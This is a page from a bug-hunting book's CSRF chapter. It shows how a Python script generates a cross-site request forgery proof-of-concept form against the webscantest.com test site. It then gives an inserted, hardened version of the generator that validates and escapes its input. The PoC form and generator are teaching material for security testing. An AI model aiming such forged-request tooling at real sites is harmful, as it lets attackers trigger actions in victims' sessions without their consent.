Page 123 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
The rest of our script is exactly the same. Now we can pass our critical information from the
command line. Passing the field information right now is a little ungainly, but in the future,
we could have it read from a generated JSON file or other data source (such as a web
scraper). Here's what our one-liner currently looks like:
python code/csrf_poc_generator.py POST application/x-www-form-urlencoded http://webscantest.com/csrf/csrfpost.php '[{ "type": "text", "name": "property", "label": "color", "value": "" }]'
And this is what the PoC it outputs looks like:
<html>
  <form action="http://webscantest.com/csrf/csrfpost.php"
        enctype="application/x-www-form-urlencoded" method="POST">
    <label>color</label>
    <input name="property" type="text" value="">
    <input type="submit" value="http://webscantest.com/csrf/csrfpost.php">
  </form>
</html>
Here's what it looks like when we open it in Chrome:
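The field information passed in the one-liner above ends up inside HTML attributes, so a stray quote in a value can break the generated PoC. The following is an added example, not the book's script: it validates the field spec and escapes every value before rendering. The function names, the allowed input types and the `@file` convention for reading the spec from a JSON file are assumptions made for illustration.

```python
import html
import json
from urllib.parse import urlsplit

ALLOWED_METHODS = {"GET", "POST"}  # the only methods an HTML form submits
ALLOWED_TYPES = {"text", "hidden", "email", "number", "password"}  # assumed set


def load_fields(source):
    """Parse the field list from a JSON string, or from a file when prefixed with '@'."""
    if source.startswith("@"):  # hypothetical convention: @fields.json
        with open(source[1:], encoding="utf-8") as fh:
            source = fh.read()
    fields = json.loads(source)
    if not isinstance(fields, list):
        raise ValueError("field spec must be a JSON array of objects")
    for f in fields:
        if not isinstance(f, dict) or not f.get("name"):
            raise ValueError("every field needs a non-empty 'name'")
        if f.get("type", "text") not in ALLOWED_TYPES:
            raise ValueError("unsupported input type: %r" % f.get("type"))
    return fields


def build_poc(method, enctype, action, fields):
    """Render the PoC form, escaping every value that lands in the markup."""
    method = method.upper()
    if method not in ALLOWED_METHODS:
        raise ValueError("HTML forms only submit GET or POST")
    if urlsplit(action).scheme not in ("http", "https"):
        raise ValueError("action must be an http(s) URL")
    esc = lambda v: html.escape(str(v), quote=True)
    rows = []
    for f in fields:
        if f.get("label"):
            rows.append("    <label>%s</label>" % esc(f["label"]))
        rows.append('    <input name="%s" type="%s" value="%s">'
                    % (esc(f["name"]), esc(f.get("type", "text")), esc(f.get("value", ""))))
    rows.append('    <input type="submit" value="%s">' % esc(action))
    return ('<html>\n  <form action="%s" enctype="%s" method="%s">\n%s\n  </form>\n</html>'
            % (esc(action), esc(enctype), method, "\n".join(rows)))


# Constructed sample input mirroring the one-liner on this page.
SAMPLE = '[{"type": "text", "name": "property", "label": "color", "value": ""}]'

if __name__ == "__main__":
    print(build_poc("POST", "application/x-www-form-urlencoded",
                    "http://webscantest.com/csrf/csrfpost.php", load_fields(SAMPLE)))
```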

